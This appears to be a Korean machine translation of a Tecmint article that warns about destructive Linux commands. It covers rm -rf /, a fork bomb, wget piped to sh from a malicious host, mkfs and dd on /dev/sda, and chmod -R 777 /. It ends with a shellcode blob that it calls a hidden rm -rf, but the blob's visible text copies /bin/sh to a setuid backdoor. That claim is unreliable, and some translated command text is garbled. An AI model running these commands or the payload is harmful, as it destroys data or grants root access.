가장 위험한 명령 - Linux에서 실행하면 안 됩니다.


명령줄 인터페이스는 Linux 시스템을 관리하기 위한 강력하고 편리한 유틸리티입니다. 특히 그래픽 인터페이스가 없는 헤드리스 시스템을 관리할 때 시스템을 실행하는 빠르고 다양한 방법을 제공합니다.

시스템 관리에 유용하지만 명령줄에는 위험이 따릅니다. 잘못된 명령을 실행하면 시스템이 손상되고 복구할 수 없는 손상이 발생할 수 있습니다. 이 가이드에서는 시스템에서 실행하지 말아야 할 가장 위험한 명령 목록을 작성했습니다.

1. rm -rf/명령

rm 명령은 사용된 인수에 따라 파일 및 디렉토리를 삭제하는 데 사용되는 Linux 명령입니다. 그러나 약간의 오타나 실수로 인해 복구할 수 없는 시스템 손상이 발생할 수 있으므로 rm 명령을 사용할 때는 각별한 주의를 기울여야 합니다.

-rf / 옵션을 사용하여 루트로 실행하면 이 명령은 Linux에서 가장 높은 루트 (/)부터 시작하여 시스템의 모든 파일과 디렉토리를 재귀적으로 삭제합니다. 파일 계층 구조. 간단히 말해서 rm -rf / 명령은 시스템을 완전히 지워서 시스템이 손상되고 복구할 수 없게 만듭니다.

rm 명령과 함께 사용되는 몇 가지 옵션은 다음과 같습니다.

  1. 리눅스의 rm 명령은 파일을 삭제하는 데 사용됩니다.
  2. rm -r 명령은 빈 폴더를 포함하여 폴더를 재귀적으로 삭제합니다.
  3. rm -f 명령은 묻지 않고 '읽기 전용 파일'을 제거합니다.
  4. rm -rf/: 루트 디렉토리의 모든 항목을 강제로 삭제합니다.
  5. rm -rf * : 현재 디렉토리/작업 디렉토리의 모든 항목을 강제로 삭제합니다.
  6. rm -rf . : 현재 폴더 및 하위 폴더를 강제로 삭제합니다.
  7. 실제로 일반 사용자로 명령을 실행하면 터미널에 두 가지 경고가 표시됩니다.

    'rm' 명령으로 파일을 실수로 삭제하는 문제를 해결하려면 \.bashrc 파일에서 'rm' 명령의 별칭을 'rm -i'로 생성하면 모든 삭제를 확인하라는 메시지가 표시됩니다.

    2. :(){:|:&};: 명령

    위의 것은 실제로 포크 폭탄입니다. :라는 함수를 만들어 작동합니다. 이 함수는 전경에서 한 번, 배경에서 한 번, 두 번 자신을 호출합니다. 이 기능은 반복적으로 실행되며 그렇게 하면 모든 시스템 리소스가 소모되어 시스템 충돌이 발생합니다.

    사실, 포크 폭탄 명령은 본질적으로 DoS(서비스 거부) 공격의 한 형태입니다. Wabbit 또는 Rabbit 바이러스라고도 합니다. 최악의 부분은 이 공격을 시작하기 위해 루트가 필요하지 않다는 것입니다.

    고맙게도 로컬 사용자가 실행하는 프로세스 수를 약 4000개로 제한하여 이 공격으로부터 자신을 보호할 수 있습니다.

    다음 명령을 실행하여 이 작업을 수행할 수 있습니다.

    $ ulimit -S -u 4000
    

    나중에 다음 명령을 사용하여 이를 확인할 수 있습니다.

    $ ulimit -u
    

    3. 명령 > /dev/sda

    명령 다음에 >/dev/sda를 실행하면 하드 드라이브의 /dev/sda 블록을 덮어씁니다. 이 블록에는 파일 시스템 데이터가 포함되어 있으며 덮어쓰면 복구할 수 없는 손상된 시스템이 됩니다.

    4. mv 폴더 /dev/null

    시도하지 말아야 할 또 다른 해로운 작업은 디렉토리나 파일을 /dev/null로 이동하는 것입니다. /dev/null 파일은 null 장치 또는 블랙홀로 알려진 특수한 유형의 파일입니다. /dev/null로 이동된 모든 것은 폐기되고 파괴됩니다.

    다음 명령은 사용자의 홈 디렉토리의 모든 내용을 /dev/null로 이동하여 결과적으로 사용자의 홈 디렉토리에 포함된 모든 데이터를 버립니다.

    # mv /home/user/* /dev/null
    

    5. wget http://malicious_source -O- | 쉿

    wget 명령은 웹 또는 파일 서버에서 파일을 다운로드하는 명령입니다. 위의 명령어는 악성 소스로부터 스크립트를 다운받아 실행한다.

    6. mkfs.ext3 /dev/sda

    mkfs 명령은 포맷된 저장 장치(대부분의 경우 하드 디스크 드라이브의 파티션)에 새 파일 시스템(ext2, ext3, ext4 등)을 만듭니다. 파티션에서 mkfs 명령을 실행하면 파티션에 저장된 모든 데이터가 지워집니다.

    디스크 파티션을 포맷하는 데 유용하지만 전체 드라이브(예: mkfs.ext3 /dev/sda)를 포맷하면 시스템이 충돌하고 복구할 수 없는 상태가 됩니다. 이것은 개인 데이터와 함께 모든 시스템 파일을 파괴하기 때문에 발생합니다.

    명령은 아래와 같이 다른 형식을 취할 수도 있습니다.

    # mkfs.ext4 /dev/sda
    # mkfs.xfs /dev/sda
    # mkfs.btrfs /dev/sda
    

    7. > 파일 명령어

    > 파일은 파일의 내용을 지우고 공백으로 둡니다. cat /dev/null > file 명령과 동의어입니다. 따라서 Linux 시스템에서 리디렉션 연산자를 사용할 때 주의해야 합니다.

    다음은 이 명령이 텍스트 파일을 덮어쓰는 방법에 대한 데모입니다. 관련된 파일이 구성 파일일 때 이 명령으로 인해 발생할 재앙을 상상할 수 있습니다.

    8. ^푸^바

    ^foo^bar 명령은 실행 방법에 따라 유용할 만큼 위험합니다. 이전에 실행한 명령을 편집하고 다시 실행할 수 있지만 명령을 실행하기 전에 명령에 대한 변경 사항에 관심이 없다면 재앙이 될 수 있습니다.

    9. dd if=/dev/random of=/dev/sda

    위의 명령은 /dev/sda 블록을 지우고 블록에 임의의 정크 데이터를 씁니다. 시스템은 일관성이 없고 복구할 수 없는 상태로 남게 됩니다.

    10. Chmod -R 777 /

    Linux 시스템이 즉시 충돌하지는 않지만 chmod -R 777 / 명령은 루트에서 시작하여 Linux 시스템의 모든 파일에 모든 권한(읽기, 쓰기 및 실행)을 재귀적으로 할당합니다.

    이렇게 하면 모든 중요한 구성 파일과 기타 파일이 모든 사용자에게 효과적으로 노출되며 이는 시스템에 막대한 보안 위험을 초래합니다. 사악한 의도를 가진 사람은 누구나 중요한 파일을 조작하여 시스템을 쉽게 손상시킬 수 있습니다.

    11. 숨겨진 명령

    아래 명령은 (rm -rf) 위의 첫 번째 명령일 뿐입니다. 여기에서 코드는 16진수로 숨겨져 있어 무지한 사용자가 속일 수 있습니다. 터미널에서 아래 코드를 실행하면 루트 파티션이 지워집니다.

    여기에서 이 명령은 위협이 숨겨져 있고 때때로 일반적으로 탐지되지 않을 수 있음을 보여줍니다. 당신은 당신이 하고 있는 일과 그 결과가 무엇인지 알고 있어야 합니다. 출처를 알 수 없는 코드를 컴파일/실행하지 마세요.

    char esp[] __attribute__ ((section(“.text”))) /* e.s.p
    release */
    = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
    “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
    “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
    “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
    “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
    “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
    “\x6e\x2f\x73\x68\x00\x2d\x63\x00″
    “cp -p /bin/sh /tmp/.beyond; chmod 4755
    /tmp/.beyond;”;

    참고: Linux 터미널이나 셸 또는 친구나 학교 컴퓨터에서 위의 명령을 실행하지 마십시오. 테스트하려면 가상 머신에서 실행하십시오.

    위 명령의 실행으로 인한 불일치 또는 데이터 손실은 문서 작성자나 Tecmint가 책임지지 않는 시스템을 중단시킵니다.

    지금은 여기까지입니다. 나는 곧 여러분이 읽고 싶어할 또 다른 흥미로운 기사를 가지고 여기 다시 올 것입니다. 그때까지 Tecmint에 계속 관심을 기울이고 연결하십시오.

    그러한 위험한 Linux 명령을 알고 있고 목록에 추가하고 싶은 경우 댓글 섹션을 통해 알려주고 소중한 피드백을 제공하는 것을 잊지 마십시오.